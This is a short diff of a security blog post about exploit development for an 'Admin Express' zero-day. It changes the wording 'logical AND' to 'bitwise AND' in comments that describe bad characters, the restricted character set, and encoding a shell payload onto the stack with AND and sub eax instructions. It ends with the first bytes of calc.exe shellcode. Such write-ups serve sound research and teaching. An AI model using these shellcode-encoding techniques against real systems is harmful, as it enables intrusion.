deveshm/connormcgarr.github.io/_posts/2019-05-13-Admin-Express-0day.md

 # 05 was a bad character for us, which is an add eax opcode.
 We could use (in hex) 1-4,6,10-7E.
 This was an odd character set.

 # Can replace with a shell, if you are willing to do the encoding and decoding math Too preoccupied for now, so here is calc.exe
-# You would need to use logical AND plus the sub eax opcodes to get a value on the stack that could jump back to the A buffer, where there is
+# You would need to use bitwise AND plus the sub eax opcodes to get a value on the stack that could jump back to the A buffer, where there is
 # much more room.
 Then you would need to align the stack with the stack pointer value you need (not 0x012F3F4 as used below) and write to the stack upwards.
-# You should have enough room for all of the logical AND plus sub eax commands to get a full-sized shell payload on the stack.
+# You should have enough room for all of the bitwise AND plus sub eax commands to get a full-sized shell payload on the stack.

 # calc.exe shellcode:
 # "\x31\xc9\x51\x68"